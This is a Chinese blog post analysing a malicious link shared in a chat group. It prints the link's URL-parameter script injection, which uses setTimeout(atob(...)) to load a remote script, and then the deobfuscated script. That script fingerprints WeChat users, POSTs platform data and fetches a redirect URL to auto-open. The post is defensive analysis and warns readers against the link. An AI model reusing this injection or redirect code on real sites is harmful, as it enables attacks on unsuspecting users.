群里的一个恶意链接分析过程
群里有这样一个链接,因为是防疫群是不可能邀请大家参加婚礼的。
于是乎好奇的点击了,然而浏览器并没有反应。
复制了链接发下是这样一个奇怪的地址
https://xxxx.com/mall/index.html?click_type=768123%27;setTimeout(atob(%27dmFyIHNzID0gZG9jdW1lbnQxY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHNzLnNyYyA9ICIvL3F3ZTEyMzMyMS5vc3MtY24tYmVpamluZy5hbGl5dW5jcy5jb20vanMvbXNnMjEuanMiOyBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoc3MpOw==%27)%2c1);//
%27 转码后 \’
%2c1 转码后 ,1
setTimeout( ) 一秒后执行
atob( ) : base64解密函数
解密后是一个 js 地址:http://xxxxxx.oss-cn-beijing.aliyuncs.com/js/msg21.js
打开发现是一个加密的JS
因为是V5 js 加密的,这块没有接触过。Js的内容无法知道,但是 作者既然不想让看到,肯定代码里面没有干好事。至于是不是盗号或者推广或是广告 就不得而知。
如此一来: 陌生链接,具有诱惑性的链接,不要点
当然这种 包含恶意的链接平台和也会很快 屏蔽。
以后有机会可以研究一下js解密。
更新一下
__________________________________________
解密后的JS
1 (function () { 2 var _0xaeeadd = { 3 \'fKPML\': function _0x14f0f0(_0x5c3713, _0x1a63d4) { 4 return _0x5c3713 + _0x1a63d4; 5 }, 6 \'QCLsm\': \'(^|&)\', 7 \'KhmkX\': \'=([^&]*)(&|$)\', 8 \'pkwUU\': function _0x32d898(_0xc21c09, _0x5cb8e1) { 9 return _0xc21c09(_0x5cb8e1); 10 }, 11 \'NImgf\': function _0x33b8ae(_0x482fe5, _0x29be10) { 12 return _0x482fe5 === _0x29be10; 13 }, 14 \'MnKMf\': \'Win\', 15 \'FNPcq\': \'Mac\', 16 \'MiFij\': function _0x354ab1(_0x1c1e1b, _0x1383fa) { 17 return _0x1c1e1b && _0x1383fa; 18 }, 19 \'xlxNW\': \'uYi\', 20 \'HlNCM\': function _0xb671d6(_0x5415a8) { 21 return _0x5415a8(); 22 }, 23 \'xbyII\': function _0x430a35(_0x4d7c9d, _0x138736) { 24 return _0x4d7c9d < _0x138736; 25 }, 26 \'PggWd\': \'POST\', 27 \'pmkHt\': \'Content-Type\', 28 \'DqzsN\': \'application/x-www-form-urlencoded\', 29 \'VfEeh\': \'rel\', 30 \'VjhJK\': \'noreferrer\', 31 \'CPxCm\': \'href\', 32 \'dsBeQ\': \'type\', 33 \'FVmgL\': function _0x1ec231(_0x598e3f, _0x42ad76) { 34 return _0x598e3f(_0x42ad76); 35 }, 36 \'swpDV\': \'sid\', 37 \'DIwHW\': \'aid\', 38 \'fSiTS\': function _0x3f03f3(_0x2009ea, _0x990f9) { 39 return _0x2009ea(_0x990f9); 40 }, 41 \'iKdOU\': \'https://xxxx/zhuanfa/index/getUrl4\', 42 \'iijAp\': \'https://www.xxx.xx\', 43 \'SRGif\': function _0x5aeb01(_0x3cabc9) { 44 return _0x3cabc9(); 45 }, 46 \'OyAtk\': function _0x3c3206(_0x2d909a) { 47 return _0x2d909a(); 48 }, 49 \'EysgW\': \'dev\', 50 \'WtgwP\': \'【开发模式】\', 51 \'RECbh\': function _0x54cbc9(_0x2eebf6) { 52 return _0x2eebf6(); 53 }, 54 \'IWljf\': \'vvT\', 55 \'EAyvE\': function _0x26768c(_0x4b9384) { 56 return _0x4b9384(); 57 }, 58 \'MBeJk\': function _0x695c5e(_0x5e669c) { 59 return _0x5e669c(); 60 } 61 }; 62 63 function _0x3aae30(_0x542f79 = null) { 64 var _0x529546 = new RegExp(_0xaeeadd[\'fKPML\'](_0xaeeadd[\'QCLsm\'], _0x542f79) + _0xaeeadd[\'KhmkX\'], \'i\'); 65 var _0x31b98d = window[\'location\'][\'search\'][\'substr\'](0x1)[\'match\'](_0x529546); 66 if (_0x31b98d != null) return _0xaeeadd[\'pkwUU\'](unescape, _0x31b98d[0x2]); 67 return null; 68 } 69 70 function _0x12824a() { 71 const _0x162822 = navigator[\'platform\']; 72 const _0x175089 = _0xaeeadd[\'NImgf\'](_0x162822[\'indexOf\'](_0xaeeadd[\'MnKMf\']), 0x0); 73 const _0xae94b8 = _0x162822[\'indexOf\'](_0xaeeadd[\'FNPcq\']) === 0x0; 74 const _0x3dcc2c = /micromessenger/ [\'test\'](navigator[\'userAgent\'][\'toLowerCase\']()); 75 if (_0xaeeadd[\'MiFij\'](_0x3dcc2c, !_0x175089) && !_0xae94b8) { 76 return !![]; 77 } else { 78 if (\'FTI\' !== _0xaeeadd[\'xlxNW\']) { 79 return ![]; 80 } else { 81 _0xaeeadd[\'HlNCM\'](_0x72f538); 82 _0xaeeadd[\'pkwUU\'](_0x191d64, \'#\'); 83 } 84 } 85 } 86 87 function _0x775b3a() { 88 const _0x4f64dc = navigator[\'userAgent\'][\'toLowerCase\'](); 89 const _0x1860d3 = /micromessenger/; 90 let _0x53b8bc = ![]; 91 if (_0x1860d3[\'test\'](_0x4f64dc)) { 92 const _0x1b8303 = _0x4f64dc[\'search\'](_0x1860d3); 93 let _0x244c59 = \'\'; 94 for (let _0xa894d5 = _0x1b8303 + 0xf; _0xaeeadd[\'xbyII\'](_0xa894d5, _0x4f64dc[\'length\']); _0xa894d5++) { 95 const _0x55e4d3 = _0x4f64dc[_0xa894d5]; 96 if (/^\d{1,}$/ [\'test\'](_0x55e4d3) || _0xaeeadd[\'NImgf\'](_0x55e4d3, \'.\')) { 97 _0x244c59 += _0x55e4d3; 98 } else { 99 break; 100 } 101 } 102 _0x244c59 = parseFloat(_0x244c59); 103 if (_0x244c59 >= 0x7) _0x53b8bc = !![]; 104 } 105 return _0x53b8bc; 106 } 107 var _0x320916 = _0xaeeadd[\'iijAp\']; 108 109 function _0x72f538() { 110 var _0x31ca84 = new XMLHttpRequest(); 111 _0x31ca84[\'open\'](_0xaeeadd[\'PggWd\'], _0x320916 + \'/\' + _0x1f1b99 + \'.xml\', !![]); 112 _0x31ca84[\'setRequestHeader\'](_0xaeeadd[\'pmkHt\'], _0xaeeadd[\'DqzsN\']); 113 _0x31ca84[\'send\'](\'platform=\' + navigator[\'platform\']); 114 } 115 116 function _0x191d64(_0x2d7909) { 117 const _0xe8c4a5 = document[\'createElement\'](\'a\'); 118 _0xe8c4a5[\'setAttribute\'](_0xaeeadd[\'VfEeh\'], _0xaeeadd[\'VjhJK\']); 119 _0xe8c4a5[\'setAttribute\'](_0xaeeadd[\'CPxCm\'], _0x2d7909); 120 document[\'body\'][\'appendChild\'](_0xe8c4a5); 121 _0xe8c4a5[\'click\'](); 122 } 123 124 function _0x5ee876() { 125 const _0x507d4c = _0x3aae30(_0xaeeadd[\'dsBeQ\']); 126 const _0x52e6be = _0xaeeadd[\'FVmgL\'](_0x3aae30, _0xaeeadd[\'swpDV\']); 127 const _0x3b61df = _0x3aae30(_0xaeeadd[\'DIwHW\']); 128 let _0x2b07b8 = \'\'; 129 if (_0x507d4c) { 130 _0x2b07b8 = \'?type=\' + _0x507d4c + \'&aid=\' + _0x3b61df; 131 } 132 _0xaeeadd[\'fSiTS\'](fetch, _0xaeeadd[\'iKdOU\'])[\'then\'](_0x2f8c1a => _0x2f8c1a[\'text\']())[\'then\'](_0x147f1f => 133 _0x191d64(atob(_0x147f1f))); 134 } 135 const _0x1f1b99 = Math[\'random\']()[\'toString\'](0x24)[\'substr\'](0x2); 136 if (!_0x12824a() || !_0xaeeadd[\'SRGif\'](_0x775b3a)) { 137 const _0xa26fef = _0xaeeadd[\'OyAtk\'](_0x3aae30); 138 if (_0xa26fef && _0xa26fef[_0xaeeadd[\'EysgW\']]) { 139 console[\'log\'](_0xaeeadd[\'WtgwP\']); 140 _0xaeeadd[\'OyAtk\'](_0x5ee876); 141 } else { 142 _0xaeeadd[\'RECbh\'](_0x72f538); 143 _0x191d64(\'#\'); 144 } 145 } else { 146 if (_0xaeeadd[\'NImgf\'](_0xaeeadd[\'IWljf\'], \'Cgo\')) { 147 console[\'log\'](_0xaeeadd[\'WtgwP\']); 148 _0xaeeadd[\'EAyvE\'](_0x5ee876); 149 } else { 150 _0xaeeadd[\'MBeJk\'](_0x5ee876); 151 } 152 } 153 }());; 154 (function (_0xe5cddc, _0xb8de6b, _0x4ff679) { 155 var _0x1b14d7 = { 156 \'Kyljy\': \'undefined\', 157 \'syTvc\': \'jsjiami.com.v5\', 158 \'GkGtd\': \'删除版本号,js会定期弹窗\' 159 }; 160 _0x4ff679 = \'al\'; 161 try { 162 _0x4ff679 += \'ert\'; 163 _0xb8de6b = encode_version; 164 if (!(typeof _0xb8de6b !== _0x1b14d7[\'Kyljy\'] && _0xb8de6b === _0x1b14d7[\'syTvc\'])) { 165 _0xe5cddc[_0x4ff679](\'删除\' + \'版本号,js会定期弹窗,还请支持我们的工作\'); 166 } 167 } catch (_0x3249a0) { 168 _0xe5cddc[_0x4ff679](_0x1b14d7[\'GkGtd\']); 169 } 170 }(window));; 171 encode_version = \'jsjiami.com.v5\'
这个js 后面对应有一个TP后台,对应的有非常多的域名 ,至于域名下这个后台是收集社么信息的 就不扒了。水平有限
文章来源:刘俊涛的博客欢迎关注公众号、留言、评论,一起学习。
__________________________________________________________________________________
若有帮助到您,欢迎点击推荐,您的支持是对我坚持最好的肯定(*^_^*)
版权声明:本文为lovebing原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。